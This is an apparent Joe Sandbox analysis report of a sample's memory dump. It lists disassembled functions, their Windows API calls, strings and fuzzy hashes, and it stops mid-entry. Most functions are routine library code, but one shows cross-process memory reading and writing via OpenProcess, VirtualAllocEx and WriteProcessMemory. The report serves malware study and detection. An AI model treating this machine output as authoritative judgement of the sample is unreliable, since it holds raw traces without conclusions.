ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
SelectObject.GDI32(?,00000000), ref: 007E96A2
BeginPath.GDI32(?), ref: 007E96B9
SelectObject.GDI32(?,00000000), ref: 007E96E2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
Instruction ID: 9833b296457b68698884e5fc11e43f17470eedc70002feb1d20accab26943e7b
Opcode Fuzzy Hash: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
Instruction Fuzzy Hash: D8218032802385EBEF119F26EC1C7AA7FA8BB06355F540216F510A65B0D3B85992CB95

Function 00835711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00835726
_memcmp.LIBVCRUNTIME ref: 00835744
_memcmp.LIBVCRUNTIME ref: 00835757
_memcmp.LIBVCRUNTIME ref: 0083576F
_memcmp.LIBVCRUNTIME ref: 00835787

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
Instruction ID: 2bb5f47a2af9611ef6f6d840a73355d62b5926c004f850489156df8560c28762
Opcode Fuzzy Hash: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
Instruction Fuzzy Hash: 4301926164561DFAD6085510AD82EBA635DFFA13A8F814020FE14DA342F668ED10C2E0

Function 00802DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6), ref: 00802DFD
_free.LIBCMT ref: 00802E32
_free.LIBCMT ref: 00802E59
SetLastError.KERNEL32(00000000,007D1129), ref: 00802E66
SetLastError.KERNEL32(00000000,007D1129), ref: 00802E6F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e51d489a02ac2b7818a257d5661a1bef9d7252ab5ee904b97a5fd1b973f449f9
Instruction ID: e656eefbfb9a9ec63dec56660faadf4020310c36e474bf22c9bc39bdb22d004f
Opcode Fuzzy Hash: e51d489a02ac2b7818a257d5661a1bef9d7252ab5ee904b97a5fd1b973f449f9
Instruction Fuzzy Hash: 1B0128362856006BC6927738AC4ED2B2A5DFFD13B9B350029F965E23E3EFF48C014121

Function 0083000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830070

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
Instruction ID: 6f875fd63380c677171821aa7c090ec9124e575df0da376b115ffda4c67d79ed
Opcode Fuzzy Hash: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
Instruction Fuzzy Hash: 2001DB72600608BFDB209F68DC54BAA7AADFB88792F118024F845D3210E7B4CD008BA0

Function 008310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
Instruction ID: 1e3d2e2acc5f935433016e66911858276e93d87e8a1d4a180067158f14f3349f
Opcode Fuzzy Hash: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
Instruction Fuzzy Hash: 8B011975200205BFDB114FA9DC4DAAA3B6EFF8A7A0F215419FA85D7360DA71DC009A60

Function 00830FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
Instruction ID: f604407330ebf52de8f568a9d5083e5b6d14931f4b65e337c0f859e595bad91c
Opcode Fuzzy Hash: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
Instruction Fuzzy Hash: 8FF06D35200701FBDB214FA5DC5DF663BADFF8AB62F125414FA89D7251CAB1DC408AA0

Function 00831014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8b4b07f214f244b39b8d05c44db6e23f21e97425c33031d819aa46a40a1dc26c
Instruction ID: 42520654d592c2eedeb3a557a78a404edcc7fa5b9923a441f8b959f5e789df00
Opcode Fuzzy Hash: 8b4b07f214f244b39b8d05c44db6e23f21e97425c33031d819aa46a40a1dc26c
Instruction Fuzzy Hash: A3F06D35200701FBDB219FA5EC5DF663BADFF8AB61F121414FA85D7250CAB5D8408AA0

Function 0084030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840324
CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840331
CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084033E
CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084034B
CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840358
CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840365

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 386f99a617e1c9b71c11fd0197185ecb68e2aaa46f920de365aaff7fe680e903
Instruction ID: 17de69f23684e2d73cac8cad46a0bb8cded1ddc7c5973d54b0a93cff1f477ee5
Opcode Fuzzy Hash: 386f99a617e1c9b71c11fd0197185ecb68e2aaa46f920de365aaff7fe680e903
Instruction Fuzzy Hash: 51016072801B199FC7309F66D890817FBF5FE502153158A3FD29692A31C7B1A955DE80

Function 0080D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0080D752

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 0080D764
_free.LIBCMT ref: 0080D776
_free.LIBCMT ref: 0080D788
_free.LIBCMT ref: 0080D79A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ee86defe5ffc14140aadef990a15bc8130be1fc1d8440702343e5bf1e57a808b
Instruction ID: 798073c86e25348fff9eb8431da84cde441a441d978e1e6d5a7e93b7317ad37d
Opcode Fuzzy Hash: ee86defe5ffc14140aadef990a15bc8130be1fc1d8440702343e5bf1e57a808b
Instruction Fuzzy Hash: 60F0FF32545304ABC6A1FBA8FDC5D167BDDFB447107A80806F048E7591C761FC8086A5

Function 00835C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00835C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00835C6F
MessageBeep.USER32(00000000), ref: 00835C87
KillTimer.USER32(?,0000040A), ref: 00835CA3
EndDialog.USER32(?,00000001), ref: 00835CBD

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: e0d1a6b3b4dd33365b4cbf9be3b61b80daa110f9946e86666c41945228daa90e
Instruction ID: c3a677c5b9e5c22dd3d1f49c401af6895554385761270cdae847cb4af85c1e60
Opcode Fuzzy Hash: e0d1a6b3b4dd33365b4cbf9be3b61b80daa110f9946e86666c41945228daa90e
Instruction Fuzzy Hash: DF01D130500B04ABEB205B10DD8EFA677B8FB10B09F01216EE283A14E0DBF4A985CA90

Function 008022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008022BE

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 008022D0
_free.LIBCMT ref: 008022E3
_free.LIBCMT ref: 008022F4
_free.LIBCMT ref: 00802305

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 791b7c022a60a9307b023e4da6fcb7667d7fa4071fa54727f0195102f4e241b3
Instruction ID: a1ef0f4eb3f930f7ee23cbf5c6c723c031a8f656ebb97baa2b708eeb69700f17
Opcode Fuzzy Hash: 791b7c022a60a9307b023e4da6fcb7667d7fa4071fa54727f0195102f4e241b3
Instruction Fuzzy Hash: 73F05E748101208FDA52FF98BC09E483F64F71A760B54051BF414E36F5DBB14811AFE5

Function 007E95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007E95D4
StrokeAndFillPath.GDI32(?,?,008271F7,00000000,?,?,?), ref: 007E95F0
SelectObject.GDI32(?,00000000), ref: 007E9603
DeleteObject.GDI32 ref: 007E9616
StrokePath.GDI32(?), ref: 007E9631

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 6063b79698ecb120a1a304c8a4097a146597b14e11bbd395a2f4b1e57d414556
Instruction ID: 7052ec66d029e5cdb85ef0d06d5906d5383aa52d89948bf6e85a39184c0c060a
Opcode Fuzzy Hash: 6063b79698ecb120a1a304c8a4097a146597b14e11bbd395a2f4b1e57d414556
Instruction Fuzzy Hash: 3CF0AF31006644EBEF125F26EC1C7B63F60BB06322F488215F565554F0D77489A1CF21

Function 00800F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008010F9
__freea.LIBCMT ref: 00801117

Part of subcall function 00801537: _free.LIBCMT ref: 0080154F

Strings

a/p, xrefs: 008011DE
am/pm, xrefs: 0080117A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 02b08537a7351cd366992b2428e0f9d5926f9288d4c23efb178de6a2abebed41
Instruction ID: 1c836e7f5e735a5e54f3d18c6fd90ca6eb019a912f546b5b9861ff2cac3f5bcb
Opcode Fuzzy Hash: 02b08537a7351cd366992b2428e0f9d5926f9288d4c23efb178de6a2abebed41
Instruction Fuzzy Hash: 4ED1DF31A0020ADACFA89F68CC8DABAB7B5FF05324F254159E541DBBD0D3799D80CB91

Function 00857B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 007F0242: EnterCriticalSection.KERNEL32(008A070C,008A1884,?,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F024D
Part of subcall function 007F0242: LeaveCriticalSection.KERNEL32(008A070C,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F028A

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9

__Init_thread_footer.LIBCMT ref: 00857BFB

Part of subcall function 007F01F8: EnterCriticalSection.KERNEL32(008A070C,?,?,007E8747,008A2514), ref: 007F0202
Part of subcall function 007F01F8: LeaveCriticalSection.KERNEL32(008A070C,?,007E8747,008A2514), ref: 007F0235

Strings

Variable must be of type 'Object'., xrefs: 00857C3A
G, xrefs: 00857C7F
5, xrefs: 00857C78

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 1b5d67f97b0728e9f7200eee4801416e23a016249405611b6b64a8c693d3e3c1
Instruction ID: a94d05912d9ab68d8eb276054d78128bb4fbabe21a42a23e8d9bd06dd792209f
Opcode Fuzzy Hash: 1b5d67f97b0728e9f7200eee4801416e23a016249405611b6b64a8c693d3e3c1
Instruction Fuzzy Hash: 0C917870A04209EFCB14EF98E8959ADB7B2FF49305F108059F8069B392DB31AE49CB51

Function 00805AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JO}, xrefs: 00805BA8, 00805C6C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID: JO}
API String ID: 0-3675885391
Opcode ID: 6316b3e555bf94de1b5db3ab2258e5385b9e6a1f865a68320b075bf819b5b675
Instruction ID: 285469eba109f78484ec83146b2b596f535ea7f78b409ca84dd688364125f06a
Opcode Fuzzy Hash: 6316b3e555bf94de1b5db3ab2258e5385b9e6a1f865a68320b075bf819b5b675
Instruction Fuzzy Hash: 2D518C71A00A099BEB619FA8CC49ABFBBB8FF05324F14005AE405E72D1DB759A018F71

Function 00832716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0083B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321D0,?,?,00000034,00000800,?,00000034), ref: 0083B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00832760

Part of subcall function 0083B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0083B3F8

Part of subcall function 0083B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0083B355
Part of subcall function 0083B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B365
Part of subcall function 0083B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008327CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083281A

Strings

@, xrefs: 00832832

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 1101d721f0fe843243aa266d9d2124afc27d664126daca2d4c3fd8275625b129
Instruction ID: a5130c0e9351b15351acc8a8fb1407ec78c91ac4ced3c1d7fbe7662c591252aa
Opcode Fuzzy Hash: 1101d721f0fe843243aa266d9d2124afc27d664126daca2d4c3fd8275625b129
Instruction Fuzzy Hash: 28410C76900218BFDB10DBA8CD45AEEBBB8FF49700F104099FA55B7181DB706E45CBA1

Function 0080172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

